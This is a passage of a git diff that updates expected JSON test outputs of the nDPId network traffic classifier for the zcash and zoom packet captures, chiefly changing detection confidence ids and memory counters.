+00917{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":145,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":145,"flow_first_seen":1514196094240,"flow_last_seen":1514197248783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":11022,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1514197248783,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":145,"source":"zcash.pcap","alias":"nDPId-test","packets-captured":145,"packets-processed":145,"total-skipped-flows":0,"total-l4-payload-len":11022,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1514197248783} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 145/145 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5883904 bytes -~~ total memory freed........: 5883904 bytes -~~ total allocations/frees...: 118262/118262 +~~ total memory allocated....: 6017538 bytes +~~ total memory freed........: 6017538 bytes +~~ total allocations/frees...: 121024/121024 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 922 chars diff --git a/test/results/zoom.pcap.out b/test/results/zoom.pcap.out index 744d0a064..22b767c94 100644 --- a/test/results/zoom.pcap.out +++ b/test/results/zoom.pcap.out @@ -2,66 +2,66 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1569520466080} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466080,"flow_last_seen":1569520466080,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1569520466080,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00735{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569520466080,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1569520466080,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjbcQAAAQEICiWcznNwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="} -01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466080,"flow_last_seen":1569520466080,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1569520466080,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.googletagmanager.com","ja3":"d78489b860c8bf7838a6ff0b4d131541","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466080,"flow_last_seen":1569520466080,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1569520466080,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.googletagmanager.com","ja3":"d78489b860c8bf7838a6ff0b4d131541","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466209,"flow_last_seen":1569520466209,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1569520466209,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569520466209,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1569520466209,"pkt":"AQBeAAD7KDc3AG3ICABFAABJ4i8AAAERNFzAqAF14AAA+xTpFOkANQtaAAAAAAABAAAAAAAAEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAAB"} -00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466209,"flow_last_seen":1569520466209,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1569520466209,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} +00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466209,"flow_last_seen":1569520466209,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1569520466209,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466316,"flow_last_seen":1569520466316,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520466316,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569520466316,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520466316,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+ZLAqAF1p2PXpNZPEVI+PYNCAAAAALAC\/\/9XugAAAgQFtAEDAwUBAQgKJZzPXwAAAAAEAgAA"} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569520466355,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520466355,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADUGBJenY9ekwKgBdRFS1k9+iDZRPj2DQ6AScSDtKQAAAgQFrAQCCArh63OkJZzPXwEDAwc="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569520466355,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520466355,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+Z7AqAF1p2PXpNZPEVI+PYNDfog2UoAQECx8vAAAAQEICiWcz4Xh63Ok"} -01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520466316,"flow_last_seen":1569520466355,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520466355,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01125{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520466316,"flow_last_seen":1569520466392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":659,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1569520466392,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"dd4b012f7a008e741554bd0a4ed12920","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520466316,"flow_last_seen":1569520466355,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520466355,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01125{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520466316,"flow_last_seen":1569520466392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":659,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1569520466392,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"dd4b012f7a008e741554bd0a4ed12920","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":16,"source":"zoom.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1569520467785} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":16,"source":"zoom.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1569520466531,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520467811,"flow_last_seen":1569520467811,"flow_idle_time":7580000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520467811,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569520467811,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1569520467811,"pkt":"EBMx8Tl2KDc3AG3ICABFAABjAABAAEAGoUnAqAF1PpWYmdRFA+E5lpAkp\/QQcoAYEABEHgAAAQEICiWc1TCZh0dJFwMDACpAXTQxH2s8yyXvpDmREm16+\/VcNt\/x\/vlsIce1k7D8R+clMelpc+AJPCA="} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520467811,"flow_last_seen":1569520467811,"flow_idle_time":7580000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520467811,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520467811,"flow_last_seen":1569520467811,"flow_idle_time":7580000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520467811,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} 00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569520468207,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1569520468207,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjTKAAAAQEICiWc1rxwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1569520468207,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569520468207,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1569520468207,"pkt":"AQBef\/\/6KDc3AG3ICABFAACaDxkAAAER+CLAqAF17\/\/\/+t7BB2wAhjkTTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1569520468207,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1569520468207,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468399,"flow_last_seen":1569520468399,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569520468399,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1569520468399,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1569520468399,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABgjegAAEARZ+DAqAF1wKgB\/wCJAIkATBmVRZdAEAABAAAAAAABIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEAAAOEAAbgAMCoAXU="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468399,"flow_last_seen":1569520468399,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569520468399,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468399,"flow_last_seen":1569520468399,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569520468399,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1569520468399,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1569520468399,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABgqi0AAEARS5vAqAF1wKgB\/wCJAIkATJqXRZhAEAABAAAAAAABIEVNRkZFREVCRkRDTkVKRU5FQkVEQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEAAAOEAAZgAMCoAXU="} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1569520468399,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1569520468399,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABgHVYAAEAR2HLAqAF1wKgB\/wCJAIkATJqURZlAEAABAAAAAAABIEVNRkZFREVCRkRDTkVKRU5FQkVEQ0FDQUNBQ0FDQUNBAAAgAAHADAAgAAEAAAOEAAZgAMCoAXU="} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468922,"flow_last_seen":1569520468922,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1569520468922,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1569520468922,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1569520468922,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA59vgAAP8RQPTAqAF1wKgBAftgADUAJTi0e18BAAABAAAAAAAAA2xvZwR6b29tAnVzAAABAAE="} 